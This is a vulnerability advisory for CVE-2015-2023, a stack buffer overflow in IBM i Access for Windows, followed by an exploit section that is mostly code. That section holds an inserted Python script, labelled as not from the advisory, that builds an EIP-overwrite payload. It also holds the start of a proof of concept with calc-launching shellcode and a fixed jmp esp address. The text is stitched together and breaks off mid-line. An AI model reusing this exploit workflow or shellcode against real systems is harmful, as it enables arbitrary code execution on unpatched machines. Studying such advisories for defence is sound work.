[+] Credits: John Page aka hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/IBMI-CLIENT-ACCESS-BUFFER-OVERFLOW.txt

Vendor:
==============
www.ibm.com

Product:
====================================================
IBM i Access for Windows
Release 7.1 of IBM i Access for Windows is affected

Vulnerability Type:
=======================
Stack Buffer Overflow
Arbitrary Code Exec

CVE Reference:
==============
CVE-2015-2023

Vulnerability Details:
=====================
IBM i Access for Windows is vulnerable to a stack-based buffer overflow. A local attacker can overflow the buffer and execute arbitrary code on the Windows PC.

Client Access can also receive remote commands through its "Cwbrxd.exe" (incoming remote command) service.
Ref: http://www-01.ibm.com/support/docview.wss?uid=nas8N1019253

"Incoming remote command was designed for running non-interactive commands and programs on a PC"

Because that service runs commands on the PC on behalf of a remote party, an attacker who can reach it could trigger the same overflow and execute arbitrary code on the system remotely. Note that IBM's own scoring treats the issue as local (AV:L); the remote path depends on the incoming remote command service being enabled and reachable.

Remediation/Fixes
The issue is fixed by obtaining and applying Service Pack SI57907. The Service Pack is available at:
http://www-03.ibm.com/systems/power/software/i/access/windows_sp.html

Workarounds and Mitigations
None known

CVSS Base Score: 4.4
CVSS Temporal Score: See http://xforce.iss.net/xforce/xfdb/104044 for the current score
CVSS Environmental Score*: Undefined
CVSS Vector: (AV:L/AC:M/Au:N/C:P/I:P/A:P)

Exploit code(s):
==============================================================================
Three Python PoC scripts follow, each exploiting a different component of IBM i Access.
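Before the author's three scripts, an added worked example (not from the advisory and not hyp3rlinx's code) of the direct EIP overwrite workflow the first PoC relies on: locate the offset to the saved return address with a cyclic pattern, pack the non-ASLR "jmp esp" address from FTDBDT.dll as a little-endian DWORD, reject it if it contains a bad character, and model what ends up in EIP and at ESP after the overwritten "ret". The address 0x638091df is the one the advisory quotes from mona; the bad-character set, the crash EIP value 0x64413364, the resulting offset of 100 bytes and the one-byte int3 stand-in for shellcode are constructed for illustration and are not the real ftdwprt.exe values.

```python
import string
import struct

# "jmp esp" address the advisory quotes from mona for FTDBDT.dll
# (ASLR: False, Rebase: False, so the address is stable across runs).
JMP_ESP_FTDBDT = 0x638091DF

# Bytes the overflowing copy must never see. A NUL would terminate the
# string copy; the other two are an assumption for a text-based input path.
# Adjust for the real target.
BAD_CHARS = b"\x00\x0a\x0d"

# x86 encodings of the stack pivots a direct EIP overwrite typically reuses.
ESP_PIVOTS = {b"\xff\xe4": "jmp esp", b"\xff\xd4": "call esp", b"\x54\xc3": "push esp; ret"}


def cyclic_pattern(length):
    """Non-repeating pattern (Aa0Aa1Aa2...) in which every 4-byte window is
    unique, so the value seen in EIP at the crash maps to exactly one offset."""
    out = bytearray()
    for upper in string.ascii_uppercase:
        for lower in string.ascii_lowercase:
            for digit in string.digits:
                out += (upper + lower + digit).encode()
                if len(out) >= length:
                    return bytes(out[:length])
    raise ValueError("pattern longer than 20280 bytes is no longer unique")


def eip_offset(crash_eip, pattern_length):
    """Offset into the pattern of the 4 bytes that landed in EIP. The CPU
    reads the return address little-endian, so pack it with '<I' first."""
    needle = struct.pack("<I", crash_eip)
    pos = cyclic_pattern(pattern_length).find(needle)
    if pos < 0:
        raise ValueError("EIP value 0x%08x not found in pattern" % crash_eip)
    return pos


def is_esp_pivot(code):
    """Return the pivot's name if the bytes at a candidate address are one of ESP_PIVOTS."""
    for enc, name in ESP_PIVOTS.items():
        if code.startswith(enc):
            return name
    return None


def build_eip_overwrite(offset, ret_addr, shellcode, nop_sled=16):
    """Layout: padding | return address (LE) | NOP sled | shellcode.
    After 'ret' pops ret_addr, ESP points at the sled, which 'jmp esp' then executes."""
    ret = struct.pack("<I", ret_addr)
    for bad in BAD_CHARS:
        if bad in ret:
            raise ValueError("return address contains bad char 0x%02x" % bad)
        if bad in shellcode:
            raise ValueError("shellcode contains bad char 0x%02x" % bad)
    return b"A" * offset + ret + b"\x90" * nop_sled + shellcode


def simulate_overflow(payload, offset):
    """Model the frame after an unbounded copy of payload into a buffer whose
    saved return address sits `offset` bytes in: (EIP, bytes at ESP after ret)."""
    eip = struct.unpack_from("<I", payload, offset)[0]
    return eip, payload[offset + 4:]


if __name__ == "__main__":
    # Constructed crash: sending cyclic_pattern(500) to the target is assumed
    # to have shown EIP = 0x64413364 ("d3Ad" on the stack); not a real ftdwprt.exe value.
    off = eip_offset(0x64413364, 500)
    payload = build_eip_overwrite(off, JMP_ESP_FTDBDT, b"\xcc")  # int3 stand-in for shellcode
    eip, at_esp = simulate_overflow(payload, off)
    print("offset=%d eip=0x%08x esp->%r pivot=%s" % (off, eip, at_esp[:4], is_esp_pivot(b"\xff\xe4")))
```

The two checks worth keeping from this when adapting a PoC: the return address is packed little-endian (the bytes on the stack read DF 91 80 63 for 0x638091df, which is why the address is searched for packed and not as text), and every byte of both the address and the shellcode is screened against the bad-character set before the payload is sent, since one stray NUL silently truncates the copy and the overwrite never reaches EIP.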
1) Exploits "ftdwprt.exe", direct EIP overwrite

import struct,os,subprocess

# raw string so "\f" in "\ftdwprt.exe" is not read as a form feed; the trailing space separates the argument that follows
pgm=r"C:\Program Files (x86)\IBM\Client Access\AFPViewr\ftdwprt.exe "

#shellcode to pop calc.exe Windows 7 SP1
sc=("\x31\xF6\x56\x64\x8B\x76\x30\x8B\x76\x0C\x8B\x76\x1C\x8B"
"\x6E\x08\x8B\x36\x8B\x5D\x3C\x8B\x5C\x1D\x78\x01\xEB\x8B"
"\x4B\x18\x8B\x7B\x20\x01\xEF\x8B\x7C\x8F\xFC\x01\xEF\x31"
"\xC0\x99\x32\x17\x66\xC1\xCA\x01\xAE\x75\xF7\x66\x81\xFA"
"\x10\xF5\xE0\xE2\x75\xCF\x8B\x53\x24\x01\xEA\x0F\xB7\x14"
"\x4A\x8B\x7B\x1C\x01\xEF\x03\x2C\x97\x68\x2E\x65\x78\x65"
"\x68\x63\x61\x6C\x63\x54\x87\x04\x24\x50\xFF\xD5\xCC")

# use jmp or call esp in FTDBDT.dll under AFPViewr for Client Access (module has no ASLR/rebase, so the address is fixed)
# we find ---> 0x638091df : jmp esp | {PAGE_EXECUTE_READ} [FTDBDT.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v2.05.04.00 (C:\Program Files (x86)\IBM\Client Access\AFPViewr\FTDBDT.dll)
rp=struct.pack('